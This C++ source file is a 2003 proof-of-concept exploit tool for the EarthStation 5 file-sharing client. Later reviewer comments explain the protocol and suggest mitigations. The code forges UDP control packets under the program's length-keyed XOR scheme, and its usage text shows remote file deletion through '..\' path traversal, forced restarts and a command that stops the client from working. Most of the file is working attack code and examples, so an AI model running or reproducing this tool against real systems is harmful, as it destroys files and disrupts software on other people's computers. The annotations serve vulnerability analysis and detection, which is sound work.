********** BEGIN esv.cpp **********
/*
 * esv - "ExploitStation V" or "EarthStation Vulnerabilities"
 * (C)2003 random nut (randnut@yahoo.com)
 * All rights reserved.
 *
 * This code is released to the public because the people behind ES5
 * would claim I lie. Thus, I have no choice but to let everyone
 * download and run this application to prove that I'm right. Only try
 * this on computers you're allowed to delete files on, and don't try
 * this at home kids.
 */

/*
 * Reviewer summary of what this file demonstrates (all of it is visible
 * in the code below, nothing is inferred from the ES5 binary):
 *
 *  - The ES5 "search service" accepts a 0x288-byte UDP datagram whose
 *    type field is 0x0C and whose sub-function field selects delete
 *    (0x07), restart (0x2F) or "expired" (0x09) -- see InitPacket0C
 *    and main().
 *  - The only per-request secret is a checksum of the shared-folder path
 *    (GetChecksum) carried in the packet; there is no session, nonce or
 *    key. The datagram is XOR-"encrypted" with a keystream that depends
 *    solely on the packet length (EsvEncrypt), so it is recoverable by
 *    anyone who has this file.
 *  - Mitigation on the receiving side is therefore authentication of
 *    control packets and canonicalisation/containment of the filename
 *    (the help text shows a "..\\" path being accepted); on the network
 *    side, filtering or monitoring UDP to the search-service port.
 */

// NOTE(review): the four header names were lost in extraction (angle
// brackets stripped). The code below uses Winsock (socket, sendto,
// WSAStartup, inet_addr), printf/exit, strlen/strcpy/strcat/strncpy/
// memset and malloc/strtoul.
#include
#include
#include
#include

// Fixed-width aliases for the 32-bit Windows build this was written for
// (uint32 == unsigned long is only 32 bits on Win32/Win64 -- confirm before
// porting; every packet offset below assumes sizeof(uint32) == 4).
typedef unsigned char uint8;
typedef unsigned short uint16;
typedef unsigned long uint32;
typedef signed char int8;
typedef short int16;
typedef long int32;

/*
 * Reimplementation of the ES5 string checksum.
 *
 * buf     bytes to fold; when buflen == 0 the length is taken from strlen(buf)
 *         (so a NUL byte in the middle of buf terminates the fold).
 * buflen  number of bytes to process, or 0 for "use strlen".
 * uplim,  the result is mapped into [lowlim, uplim] via a modulo; callers on
 * lowlim  this page always use the defaults.
 *
 * Returns the folded value as uint32.
 *
 * NOTE(review): the fold is XOR of each byte shifted into position i&3 of a
 * signed int. *buf is a plain char, so for bytes >= 0x80 (non-ASCII path
 * characters) the value is sign-extended before the shift on compilers where
 * char is signed; a port must keep that behaviour to stay wire-compatible.
 * NOTE(review): with the default limits, uplim - lowlim + 1 is 0x7FFFFFFF + 1,
 * which overflows int (undefined in standard C/C++); the original build
 * evidently relied on two's-complement wrap, giving chksum % INT_MIN. Keep
 * this in mind if the function is ever compiled with UB sanitizers or LTO.
 * NOTE(review): identifiers beginning with two underscores are reserved for
 * the implementation; the name is kept here unchanged.
 */
uint32 __GetChecksum(const char* buf, int buflen = 0, int uplim = 0x7FFFFFFF, int lowlim = 0)
{
    if (buflen == 0)
        buflen = (int)strlen(buf);
    int chksum = 0;
    // i&3 selects which byte lane (0..3) of the 32-bit accumulator this
    // byte lands in; shift width is 0, 8, 16 or 24.
    for (int i = 0; i < buflen; i++, buf++)
        chksum ^= *buf << (8*(i&3));
    // Negative chksum keeps its sign through %, then is added to lowlim and
    // reinterpreted as uint32.
    return (uint32)(lowlim + (chksum % (uplim - lowlim + 1)));
}

/*
 * Checksum as placed into the packet: the raw fold XORed with 0x7FFFFFFF.
 * main() feeds it the shared-folder path *including* the trailing backslash
 * appended by NewDirString, so the receiver's string must match byte for
 * byte (the help text's "case sensitive" remark follows from this).
 */
uint32 GetChecksum(const char* lpszString)
{
    return __GetChecksum(lpszString) ^ 0x7FFFFFFF;
}

/*
 * Zero a packet buffer and fill the common header.
 *
 * pkt     destination, at least `size` bytes, uint32-aligned.
 * size    total packet length in bytes; stored at byte offset 0.
 * packet  packet type; stored at byte offset 8.
 *
 * Byte offset 4 always holds 2180 and byte offset 0x58 always holds 0x3EFA;
 * what those fields mean to ES5 is not visible here. Because the header
 * fields are constant and the later XOR keystream depends only on `size`,
 * these bytes are constant on the wire for every packet of a given length --
 * useful for a defender building a signature for this traffic.
 */
void InitPacket(uint32* pkt, int size, uint32 packet)
{
    memset(pkt, 0, size);
    pkt[0x0000/4] = size;
    pkt[0x0004/4] = 2180;
    pkt[0x0008/4] = packet;
    pkt[0x0058/4] = 0x3EFA;
}

/*
 * Build a type-0x0C control packet (0x288 bytes).
 *
 * pkt         destination; main() passes uint32[0x0288/4], i.e. exactly 0x288 bytes.
 * sub_func    sub-command at byte offset 0x7C (0x07, 0x2F, 0x09 are used by main()).
 * lpszString  NUL-terminated argument copied to byte offset 0x88.
 * CheckSum    value for byte offset 0x80 (GetChecksum of the shared dir for
 *             the delete command, 0 otherwise).
 *
 * strncpy copies at most 0x1FF bytes into the 0x200-byte string area; the
 * buffer was zeroed by InitPacket and 0x88 + 0x1FF == 0x287 < 0x288, so the
 * string is always NUL-terminated inside the packet (longer input is silently
 * truncated rather than overflowing).
 */
void InitPacket0C(uint32* pkt, uint32 sub_func, const char* lpszString = "", uint32 CheckSum = 0)
{
    InitPacket(pkt, 0x288, 0x0C);
    pkt[0x007C/4] = sub_func;
    pkt[0x0080/4] = CheckSum;
    strncpy((char*)&pkt[0x0088/4], lpszString, 0x200-1);
}

// IMPORTANT:
// If ArraySize isn't a multiple of sizeof(uint32) then the last
// bytes starting from pArray[ArraySize] will be overwritten.
// (The only caller on this page, EsvEncrypt, rounds its buffer up to a
// multiple of 4 for exactly this reason.)
/*
 * Fill pArray with the XOR keystream used by EsvEncrypt.
 *
 * pArray  output; written in whole uint32 units, so it must be at least
 *         `size` rounded up to a multiple of 4 bytes (see IMPORTANT above).
 * size    number of keystream bytes wanted.
 * k       seed; EsvEncrypt passes the packet length.
 *
 * The state d starts at the constant 0x78B7 and is stepped as d = d*c + k
 * with c = 0x6AC690C5, while k is rebuilt from 16-bit partial products of
 * old_d and c. This looks like a 32-bit emulation of the high word of the
 * 64-bit product old_d*c + k (a multiply-with-carry style generator) --
 * TODO confirm against the ES5 binary before relying on that description.
 * What is certain from the code: the keystream is a pure function of
 * `k`, i.e. of the packet length, with no key material involved.
 *
 * NOTE(review): (uint32)(-(int32)k) negates a signed value; for
 * k == 0x80000000 that is signed overflow (UB). The original build relied on
 * wrap-around here.
 */
static void EsvInitEncryptArray(char* pArray, int size, uint32 k)
{
    uint32 d = 0x78B7;
    uint32* pBuf = (uint32*)pArray;
    const uint32 c = 0x6AC690C5;
    const uint32 cl = c & 0xFFFF;   // low 16 bits of the multiplier
    const uint32 ch = c >> 0x10;    // high 16 bits of the multiplier
    for (int i = 0; i < size; i += 4, pBuf++) {
        const uint32 old_d = d;
        d = d * c + k;
        // Sum of the cross terms that land in the upper 32 bits of old_d*c.
        k = (((old_d >> 0x10) * ch) + (((old_d >> 0x10) * cl) >> 0x10)) + (((old_d & 0xFFFF) * ch) >> 0x10);
        // Carry out of the low word: true iff (old_d & 0xFFFF)*cl + k >= 2^32.
        if (((old_d & 0xFFFF) * cl) >= (uint32)(-(int32)k))
            k++;
        *pBuf = d;
    }
}

/*
 * XOR `size` bytes of pBuf in place with the keystream.
 *
 * Byte i becomes pBuf[i] ^ pArray[i % ArraySize] ^ (uint8)i. The keystream
 * repeats every ArraySize bytes and the position byte is public, so this is
 * symmetric: calling it twice with the same array restores the plaintext.
 */
static void EncryptBuffer(char* pBuf, int size, const char* pArray, int ArraySize)
{
    uint8* pWorkBuf = (uint8*)pBuf;
    for (int i = 0; i < size; i++, pWorkBuf++)
        *pWorkBuf ^= (uint8)(pArray[i % ArraySize] ^ i);
}

/*
 * Encrypt a whole packet in place.
 *
 * The 0x2F-byte keystream is seeded with the packet size only, so every
 * packet of the same length is XORed with the same bytes -- a defender can
 * treat the constant header fields as a fixed ciphertext pattern, and the
 * scheme offers no confidentiality against anyone holding this code.
 *
 * Array is sized to the next multiple of sizeof(uint32) (0x30 bytes) because
 * EsvInitEncryptArray writes whole uint32 units; 12 units == 48 bytes fits.
 * NOTE(review): `const ArraySize` relies on the old implicit-int extension.
 */
static void EsvEncrypt(void* pBuf, int size)
{
    const ArraySize = 0x2F;
    char Array[(ArraySize + sizeof(uint32) - 1) & ~(sizeof(uint32)-1)];
    EsvInitEncryptArray(Array, ArraySize, size);
    EncryptBuffer((char*)pBuf, size, Array, ArraySize);
}

/*
 * Encrypt pkt in place and send it MaxSendTries times over UDP.
 *
 * pkt           packet built by InitPacket0C; byte offset 0 holds its length.
 *               After this call pkt contains ciphertext -- it must be rebuilt
 *               with InitPacket0C before being sent again (main() does so).
 * IpAddr        destination IPv4 address in host byte order (htonl is applied).
 * IpPort        destination UDP port in host byte order.
 * MaxSendTries  number of datagrams to send. Despite the name this is not a
 *               retry count: the loop sends unconditionally and only stops
 *               early on error. With 0 nothing is sent and 1 is still returned.
 *
 * Returns 1 on success, 0 after printing a diagnostic on socket()/sendto()
 * failure.
 *
 * NOTE(review): the socket is never closed on any path (no closesocket).
 * NOTE(review): `size != dwSize` compares int with uint32; harmless here
 * because SOCKET_ERROR is tested first.
 */
int SendPacket(uint32* pkt, uint32 IpAddr, uint16 IpPort, int MaxSendTries)
{
    uint32 dwSize = pkt[0x0000/4];
    EsvEncrypt(pkt, dwSize);
    SOCKET s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (s == INVALID_SOCKET) {
        printf("socket() failed\n");
        return 0;
    }
    for (int i = 0; i < MaxSendTries; i++) {
        sockaddr_in sa;
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(IpPort);
        sa.sin_addr.s_addr = htonl(IpAddr);
        int size = sendto(s, (char*)pkt, dwSize, 0, (sockaddr*)&sa, sizeof(sa));
        if (size == SOCKET_ERROR || size != dwSize) {
            printf("sendto() failed\n");
            return 0;
        }
    }
    return 1;
}

/*
 * Print usage and exit(1). Called for any argument error and when no
 * command option was given.
 *
 * NOTE(review): the option placeholders after "/d" and "/s" (and the
 * "/i"/"/p" arguments) appear to have been lost in extraction along with the
 * include names; the text is kept byte-for-byte as found.
 */
void help()
{
    printf(
        "/R - Max UDP sendto() retries\n"
        "/r - Restart remote computer's ES5.exe\n"
        "/e - Tell remote computer's ES5.exe it's expired\n"
        "/d - Delete file \n"
        "/s - Remote computer's shared dir"
        "(case sensitive.)\n"
        " Use quotes if path contains spaces.\n"
        "/i - Remote computer's IP\n"
        "/p - Remote computer's \"Search Service\" port\n"
        "\n"
        "The examples below assume remote ES5.exe is using IP=127.0.0.1"
        " and port=1234\n"
        "\n"
        "Example 1:\n"
        " esv /r /i 127.0.0.1 /p 1234\n"
        "This will restart remote computer's ES5.exe.\n"
        "\n"
        "Example 2:\n"
        " esv /e /i 127.0.0.1 /p 1234\n"
        "This will force remote computer's ES5.exe to stop functioning, "
        "and let the\n"
        "user know about it.\n"
        "\n"
        "Example 3:\n"
        " esv /d ..\\..\\..\\WINDOWS\\NOTEPAD.EXE /s "
        "\"C:\\Program Files\\EarthStation5\\New Media Files\""
        " /i 127.0.0.1 /p 1234\n"
        "This will delete the file \"\\WINDOWS\\NOTEPAD.EXE\". This will "
        "not work\n"
        "under Win98 (and probably Win95/WinME) but does work under "
        "WinXP (and\n"
        "probably WinNT, Win2000, Win2003)\n"
        "\n"
        "Example 4:\n"
        " esv /d readme.txt /s \"C:\\Program Files\\EarthStation5\\"
        "New Media Files\" /i 127.0.0.1 /p 1234\n"
        "This will delete the file \"readme.txt\" in the folder\n"
        "\"C:\\Program Files\\EarthStation5\\New Media Files\".\n"
        "and works with all Windows versions\n"
        "\n"
        "IMPORTANT:\n"
        "The shared folder is case sensitive, and you must use the exact "
        "same path\n"
        "as ES5.exe does. If path = \"C:\\Program Files\\ES5\\Files\", "
        "then make sure\n"
        "that ES5.exe doesn't use the shorter path \"C:\\Progra~1\\ES5"
        "\\Files\"\n"
        "or has uppercased all letters. You can find out the exact path in\n"
        "ES5.exe's settings. Copy and paste that string.\n"
    );
    exit(1);
}

/*
 * Return a heap copy of s with a single backslash appended.
 *
 * Allocates strlen(s) + 1 (backslash) + 1 (NUL) bytes, so the copy cannot
 * overflow. Returns NULL if malloc fails. Ownership passes to the caller;
 * main() keeps the pointer for the process lifetime and never frees it.
 */
char* NewDirString(const char* s)
{
    char* szNew = (char*)malloc(strlen(s) + 1 + 1);
    if (szNew == NULL)
        return szNew;
    strcpy(szNew, s);
    strcat(szNew, "\\");
    return szNew;
}

/*
 * Command-line entry point.
 *
 * Parses /r, /e, /d <file>, /s <dir>, /i <ip>, /p <port>, /R <count>
 * (a leading '-' is accepted in place of '/'), initialises Winsock 2.2,
 * then sends the selected command(s) in the order delete, restart, exit.
 * Any parse error, a missing IP or port, or no command at all ends in help().
 *
 * Returns 0 on success (implicit in C++), 1 on Winsock, allocation or send
 * failure.
 *
 * NOTE(review): the sender performs no validation of lpszFilename; whether
 * the receiver canonicalises it is not visible here (the help text reports
 * that a "..\\" path is honoured on some Windows versions).
 * NOTE(review): /R is parsed with strtoul and stored in an int, so
 * out-of-range or negative-looking input is accepted without a check; 0
 * results in no datagrams being sent while "Done!" is still printed.
 * NOTE(review): WSACleanup is never called; process exit reclaims it.
 */
int main(int argc, char** argv)
{
    int MaxSendTries = 50;          // Should be more than enough...
    uint32 IpAddr = 0;              // Remote comp's IP
    uint16 IpPort = 0;              // Remote comp's Search Service port
    int RestartOption = 0;          // /r option
    int ExitOption = 0;             // /e option
    int DeleteOption = 0;           // /d option
    const char* lpszSharedDir = NULL;
    const char* lpszFilename = NULL;
    uint32 pkt0C[0x0288/4];         // exactly the 0x288 bytes InitPacket0C fills

    for (int i = 1; i < argc; i++) {
        char* s = argv[i];
        if (*s != '/' && *s != '-')
            help();
        s++;
        if (!strcmp(s, "r")) {
            RestartOption = 1;
        } else if (!strcmp(s, "e")) {
            ExitOption = 1;
        } else if (!strcmp(s, "d")) {
            DeleteOption = 1;
            if (++i >= argc) help();
            lpszFilename = argv[i];
        } else if (!strcmp(s, "s")) {
            if (++i >= argc) help();
            // Trailing backslash is appended here and becomes part of the
            // checksummed string.
            lpszSharedDir = NewDirString(argv[i]);
            if (lpszSharedDir == NULL) {
                printf("Out of memory\n");
                return 1;
            }
        } else if (!strcmp(s, "i")) {
            if (++i >= argc) help();
            IpAddr = inet_addr(argv[i]);
            if (IpAddr == INADDR_NONE) help();
            // Stored in host order; SendPacket applies htonl again.
            IpAddr = ntohl(IpAddr);
        } else if (!strcmp(s, "p")) {
            if (++i >= argc) help();
            // Base 0: decimal, 0x-prefixed hex or 0-prefixed octal accepted.
            uint32 p = strtoul(argv[i], NULL, 0);
            if (p == 0 || p > 0xFFFF) help();
            IpPort = (uint16)p;
        } else if (!strcmp(s, "R")) {
            if (++i >= argc) help();
            MaxSendTries = strtoul(argv[i], NULL, 0);
        } else {
            help();
        }
    }
    if (IpAddr == 0 || IpPort == 0)
        help();

    WSAData wsa;
    int ret;
    if ((ret = WSAStartup(MAKEWORD(2,2), &wsa)) != 0) {
        printf("Could not initialize WinSock. Error %08X\n", ret);
        return 1;
    }
    if (wsa.wVersion != 0x0202) {
        printf("Couldn't init WinSock 2.2\n");
        return 1;
    }

    int did_something = 0;
    if (DeleteOption) {
        // Both the filename and the shared dir are required for sub-function 0x07.
        if (lpszFilename == NULL || lpszSharedDir == NULL)
            help();
        printf("Sending command to delete file \"%s\" in folder " "\"%s\"...", lpszFilename, lpszSharedDir);
        InitPacket0C(pkt0C, 0x07, lpszFilename, GetChecksum(lpszSharedDir));
        if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries))
            return 1;
        printf("Done!\n");
        did_something = 1;
    }
    if (RestartOption) {
        // pkt0C is rebuilt here because SendPacket left it encrypted.
        InitPacket0C(pkt0C, 0x2F);
        printf("Sending command to restart remote ES5.exe...");
        if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries))
            return 1;
        printf("Done!\n");
        did_something = 1;
    }
    if (ExitOption) {
        InitPacket0C(pkt0C, 0x09);
        printf("Sending command to close remote ES5.exe...");
        if (!SendPacket(pkt0C, IpAddr, IpPort, MaxSendTries))
            return 1;
        printf("Done!\n");
        did_something = 1;
    }
    if (!did_something)
        help();
}
********** END esv.cpp **********